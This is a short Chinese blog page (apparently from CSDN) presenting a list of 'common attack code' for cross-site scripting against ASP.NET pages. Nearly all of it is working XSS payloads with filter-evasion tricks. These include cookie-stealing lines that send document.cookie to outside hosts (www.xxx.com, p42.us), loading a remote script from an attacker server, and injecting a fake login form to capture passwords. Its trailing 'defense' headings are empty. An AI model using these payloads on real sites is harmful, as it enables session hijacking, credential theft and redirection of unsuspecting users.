Asp.net跨站脚本攻击XSS实例分享-CSDN博客

Asp.net跨站脚本攻击XSS实例分享

常用攻击代码：

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> 
Redirection Attack 

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.xxx.com")> 
Cookie stealing 

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:e/**/xpression(window.location= 
"http://www.xxx.com/cookiemonster.php?sid="%2bdocument.cookie)> 
Unrestricted HTML injection from external '.js' file 

http://target/vuln-search.aspx?term= 
</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild 
(document.createElement("script")))> 

</XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))> 
where 'xss.js' could contain a snippet that overwrites the entire document's HTML body. i.e.: 
document.body.innerHTML = '<b>since we can now insert brakets without having to escape the request filtering, we\'re free to insert any HTML tags</b></br><form name="myform" action="http://www.procheckup.com"><input type="text" name="login"><br/><input type="password" name="password"></br><input type="submit" value="Log in"></form>'; 
<object><param name="src" value=
"javascript:alert(0)"></param></object>
<object data="javascript:alert(0)">
<isindex type=image src=1 οnerrοr=alert(1)>
<isindex action=javascript:alert(1) type=image
<x:script xmlns:x="http://www.w3.org/1999/
xhtml">alert('xss');</x:script>
location='javascript:alert(0)';
location=name;
http://site.com/?p=";eval(unescape(location))//#
%0Aalert(0)
<b/alt="1"οnmοuseοver=InputBox+1
language=vbs>test</b>
</a οnmοusemοve="alert(1)">
<a οnmοusemοve="alert(1)">test</a>
<html><title>{alert('xss')}</title></html>
";document.write('<img src=http://p42.us/
x.png?'%2bdocument.cookie%2b'>');"
";document.write('<img sr'%2b'c=http://p42.us/
x.png?'%2bdocument['cookie']%2b'>');"
<b "<script>alert(1)</script>">hola</b>
等等

Asp.net跨站脚本攻击XSS实例分享

Asp.net跨站脚本攻击XSS实例分享

XSS脚本列表：

防御XSS列表：

部分实例分享：

其他实例：